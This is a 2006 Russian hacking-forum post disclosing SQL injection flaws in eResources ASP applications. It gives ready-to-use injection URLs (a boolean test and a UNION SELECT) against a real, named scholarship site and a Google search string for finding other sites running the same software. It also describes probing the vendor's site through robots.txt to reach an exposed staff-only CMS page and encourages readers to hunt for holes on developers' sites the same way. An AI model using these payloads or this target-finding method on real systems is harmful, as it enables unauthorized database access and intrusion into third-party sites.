ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

SQL-injection в eResources Online Application System
  #1  
Старый 11.11.2006, 02:07
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию SQL-injection в eResources Online Application System

Продукция компании eResources представляет собой asp скрипты, которые почему-то никто не любит и не рассматривает. По большей части у eResources они дырявые.

SQL - injections присутствует в переменных subsectionID и PageID:
_http://scholarships.hispanicfund.org/applications/subsectionID.1,pageID.126%20and(1=1)--/default.asp
_http://scholarships.hispanicfund.org/applications/subsectionID.199999+union+select+null,4--,pageID.126/default.asp


Google tip:
Powered By eResources inurlageID


Скажу сразу - я проверил и в сотальных продуктах данной компании багов не меньше. Более того, по традиции, начатой мной в сегодняшней статье, я заглянул на сайт разработчиков и поробовал поискать баги на нем (всегда советую Вам так делать, т. к. 60% дырявый скрипт присутствует на сайте создателя, а зесли не присутствует, значит создатели знают, что их продукция безбожно бажная и отказываюся от нее, что тоже приводит к плохим последствиям).
Так вот.

_http://www.eresources.com/robots.txt
вывел мне
User-agent: *
Disallow: /admin
Disallow: /doclib
Disallow: /include
Disallow: /imglib
Disallow: /scripts
Disallow: /zER_backup
Disallow: /zER_CMS

А запрос:
_http://www.eresources.com/zER%5FCMS/section_add.asp
предложил мне побаловаьтся, но так как я не счел это нужным, то и трогать не стал:

CMS Mini Powerful Tool
переходим в Add и таму нас формочка, заносящая вводимые данные в базу. Чем это чревато, я думаю, понятно.

CMS ADMINISTRATION PAGE
(To be used by eResources Staff Only)
Только для staff!!! Поэтому я трогать не стал. )
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ